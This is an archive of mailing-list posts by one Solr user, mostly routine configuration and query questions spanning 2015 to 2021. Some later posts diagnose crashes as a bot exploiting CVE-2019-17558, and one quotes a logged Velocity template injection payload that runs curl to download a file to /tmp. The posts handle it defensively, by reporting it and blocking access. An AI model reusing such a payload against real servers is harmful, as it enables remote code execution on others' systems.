Lucene test framework documentation?

2015-01-08 Thread TK Solr
Is there any good document about Lucene Test Framework? I can only find API docs. Mimicking the unit test I've found in Lucene trunk, I tried to write a unit test that tests a TokenFilter I am writing. But it is failing with an error message like: java.lang.AssertionError: close() called in wrong

Re: Solr Multilingual Indexing with one field- Guidance

2015-05-12 Thread TK Solr
On 5/7/15, 11:23 AM, Kuntal Ganguly wrote: 1) Is this a correct approach to do it? Or i'm missing something? Does the user wants to see the documents that he/she doesn't understand? The words such as doctor, taxi, etc. are common among many languages in Europe. Would the Spanish user wants to

Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-20 Thread TK Solr
On 5/20/15, 8:21 AM, Shawn Heisey wrote: As of right now, there is still a .war file. Look in the server/webapps directory for the .war, server/lib/ext for logging jars, and server/resources for the logging configuration. Consult your container's documentation to learn where to place these

Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-20 Thread TK Solr
Never mind. I found that thread. Sorry for the noise. On 5/20/15, 5:56 PM, TK Solr wrote: On 5/20/15, 8:21 AM, Shawn Heisey wrote: As of right now, there is still a .war file. Look in the server/webapps directory for the .war, server/lib/ext for logging jars, and server/resources

Re: YAJar

2015-06-08 Thread TK Solr
Maybe maven shade can help your situation ? Create a self-contained jar with guava package renamed. Not very pretty but

Re: Where is schema.xml ?

2015-06-17 Thread TK Solr
On 6/17/15, 2:35 PM, Upayavira wrote: Do you have a managed-schema file, or such? You may have used the configs that have a managed schema, i.e. one that allows you to change the schema via HTTP. I do see a file named managed-schema without .xml extension in the conf directory. Its content

Where is schema.xml ?

2015-06-17 Thread TK Solr
With Solr 5.2.0, I ran: bin/solr create -c foo This created solrconfig.xml in server/solr/foo/conf directory. Other configuration files such as synonyms.txt are found in this directory too. But I don't see schema.xml. Why is schema.xml handled differently? I am guessing

Re: [solr 5.1] Looking for full text + collation search field

2015-05-29 Thread TK Solr
On 5/21/15, 5:19 AM, Björn Keil wrote: Thanks for the advice. I have tried the field type and it seems to do what it is supposed to in combination with a lower case filter. However, that raises another slight problem: German umlauts are supposed to be treated slightly different for the

Re: solr 5.x on glassfish/tomcat instead of jetty

2015-05-22 Thread TK Solr
On 5/21/15, 5:26 AM, Steven White wrote: Hi TK, Can you share the thread you found on this WAR topic? Steve, Actually, that was my mistake. I still don't know why WARs are bad. In the thread Solr 5.0, Jetty and WAR, which you started and are familiar with,

Re: Extended characters

2017-10-29 Thread TK Solr
I think you can use ASCIIFoldingFIlter by inserting its factory in your schema.

Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr
My client's Solr 6.6 running on a Windows server is mysteriously crashing without any JVM crash log. No unusual activities recorded in solr.log. GC log does not indicate the OOM situation. It's a simple single-core, single node deployment (no solrCloud). It has very light load. No indexing

Re: Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr
On 6/5/18 10:31 AM, Christopher Schultz wrote: How about Apache procrun/commons-daemon? Thank you, I'll take a look. On 6/5/18 1:51 PM, Shawn Heisey wrote: The best bet for an easy service install is probably NSSM. It's got a

Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr
Thank you, Mikhail. But this didn't work. The first {!parent which='...' v='...'} alone works. But the second {!parent ...} clause is completely ignored. In fact, if I turn on debugQuery, rawquerystring and querystring have the second query but parsedquery and parsedquery_toString only have the

Bitnami, or other Solr on AWS recommendations?

2018-01-26 Thread TK Solr
If I want to deploy Solr on AWS, do people recommend using the prepackaged Bitnami Solr image? Or is it better to install Solr manually on a computer instance? Or are there a better way? TK

literal.* use in posting PDF files

2018-01-30 Thread TK Solr
I have a schema.xml defined to require two fields, "id" and "libDocumentID". solrconfig.xml is the standard one. Using curl, I tried posting a PDF file like this: curl 'http://localhost:8983/solr/update/extract?' -F "myfile=@foo.pdf" but I got: [doc=foo.pdf]

Minimum memory requirement

2018-01-31 Thread TK Solr
On my AWS t2.micro instance, which only has 1 GB memory, I installed Solr (4.7.1 - please don't ask) and tried to run it in sample directory as java -jar start.jar. It exited shortly due to lack of memory. How much memory does Solr require to run, with empty core? TK

Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr
Ah, that's what _root_ is for ! I was wondering. Thank you! On 7/25/18 2:36 PM, Mikhail Khludnev wrote: _root_:parent-id чт, 26 июля 2018, 1:33 TK Solr : The child doc transformer worked great. Thank you. In my experiment, posting 'parent-id' to the update end point only deleted

How to retrieve nested documents (parents and their children together) ?

2018-07-22 Thread TK Solr talks about {!parent which=} docs>, which returns parent docs only, and {!child of=} , which returns child docs only. Is there a way to retrieve the matched documents in the original, nested form?

Re: How to retrieve nested documents (parents and their children together) ?

2018-07-24 Thread TK Solr
[child] or [subquery]. Although, it's worth to put reference to it somewhere in blockjoin qparsers. Documentation patches are welcome. On Sun, Jul 22, 2018 at 10:25 AM TK Solr wrote: https

Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr
The child doc transformer worked great. Thank you. In my experiment, posting 'parent-id' to the update end point only deleted the parent doc. Do I insert a complex join query from id to _version_ and delete all the docs of the matching _version_ ? On 7/24/18 9:27 PM, TK Solr wrote: Thank

Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr
Mikhail, Actually, your suggestion worked! I was making a typo on the field name. Thank you very much! TK p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide On 7/8/18 11:04 AM, TK Solr wrote: Thank you. This is more promising because I see the sec

Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr
attrvalue:drama'} AND _query_:{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} q=+{!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} +{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'} Beware of escape en

Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr
I have a document with child documents like: maindoc_121 true child_121_1 genre drama child_121_2 country USA The child documents have the same set of fields. I can write a query that has a child which has attrname=genre

Re: Run solr server using Java program

2018-04-21 Thread TK Solr
The solr.cmd starts Solr by running java -jar start.jar, which has the MANIFEST file that tells the java command that it's main class is org.eclipse.jetty.start.Main. So, I would think your Java program should be able to start Solr (jetty, really) by calling

ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
In the usage example shown in ReversedWildcardFilter in Solr Ref Guide, and only usage find in managed-schema to define text_general_rev, the filter is used only for indexing.  

Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
, TK Solr wrote: In the usage example shown in ReversedWildcardFilter <> in Solr Ref Guide, and only usage find in managed-schema to define text_general_rev, the filter is used only for in

Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr
xed is mar, then the reversed token would be \u0001ram, so a search for 'ram' wouldn't accidentally match that). If *withOriginal* is set to true then it will reverse the normal token as well as the reversed token. On Thu, 9 Apr 2020 at 02:27, TK Solr wrote: I experimented with the index-tim

Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr
"11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{ "match":true, "value":1.0, "description":"email:*"}, The email field uses ReversedWildcardFilter for both indexing and query. On 4/15/20 12:04 PM, Erick Erickson wrote: What do you see if you add =

Spellcheck on specified fields?

2020-04-07 Thread TK Solr
I query on multiple field like: q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true The raw query terms are distributed to all fields because I don't know what term is intended to for which field. If I misspell seattle, I get 3 suggestions: "spellcheck":{     "suggestions":[

Re: Spellcheck on specified fields?

2020-04-07 Thread TK Solr
Correction. "mark seattle" query doesn't show suggestions since "mark" alone has some hits. It is when the same logic is used for a single term query of "seatle" that 3 suggestions of "seattle" are returned. Do I have to identify the field by using startO

Proper way to manage managed-schema file

2020-04-06 Thread TK Solr
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and modifying managed-schema. I noticed that Solr does override this file wiping out all my comments and rearranging the order. I noticed there is a "DO NOT EDIT" comment. Then, what is the proper/expected way to

Re: Admin UI core loading fails

2020-04-06 Thread TK Solr
'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($} hits=0 status=0 QTime=1 On 4/2/20 12:50 AM, TK Solr wrote: I'm on Solr 8.3.1 running

Admin UI core loading fails

2020-04-02 Thread TK Solr
I'm on Solr 8.3.1 running in non-solrcloud mode. When I tried to reload an existing core from Admin UI's "Core Admin" by clicking Reload, after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analyzer section. I

Re: Admin UI core loading fails

2020-04-02 Thread TK Solr
der.enabled=true,params.resource.loader.enabled=true}} 2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] o.a.v.loader ResourceManager: unable to find resource 'custom.vm' in any resource loader. 2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] o.a.s.s.HttpSolrCall

"Failed to reserve shared memory."

2021-01-06 Thread TK Solr
My client is having a sudden death syndrome of Solr 8.3.1. Solr stops responding suddenly and they have to restart Solr. (It is not clear if the Solr/jetty process was dead or alive but not responding. The OOM log isn't found.) In the Solr start up log, these three error messages were found:

The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr
On the Admin UI's login screen, when the Logging tab is clicked, I see lines like: Time(Local)  Level  Core    Logger    Message 1/7/2021 ERROR x:mycoreloader ResourceManager: unable to find resource 'custom.vm'

Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr
-day-vulnerability Fortunately the attack isn't succeeding because of SOLR-13971 fix, and instead it is causing these errors. I'll fortify the Solr access. On 1/7/21 11:02 AM, TK Solr wrote: On the Admin UI's login screen, when the Logging tab is clicked, I see lines like: Time(Local)  Level

Re: "Failed to reserve shared memory."

2021-01-07 Thread TK Solr
is gone, which is good but all other -XX:* except -XX:+UseG1GC are also gone. What is the correct way to remove just -XX:UseLargePage ? TK On 1/6/21 3:42 PM, TK Solr wrote: My client is having a sudden death syndrome of Solr 8.3.1. Solr stops responding suddenly and they have to restart Solr

Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr
Victor & Satish, Is your Solr accessible from the Internet by anyone? If so, your site is being attacked by a bot using this security hole: If that is the case, try blocking the

Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr
Oops, I should have referenced this document rather: <> On 2/3/21 2:42 PM, TK Solr wrote: Victor & Satish, Is your Solr accessible from the Internet by anyone? If so, your site is being attacke

Re: CVE-2019-17558 on SOLR 6.1

2021-02-13 Thread TK Solr
(Resending to the list. Sorry, Rick.) FYI, my client was using 8.3.1, which should have mitigated the attack. But the server was suffering a sudden death of the Solr process, and the log showed it was being attacked using CVE-2019-17558. We blocked the external access of Solr API. Then this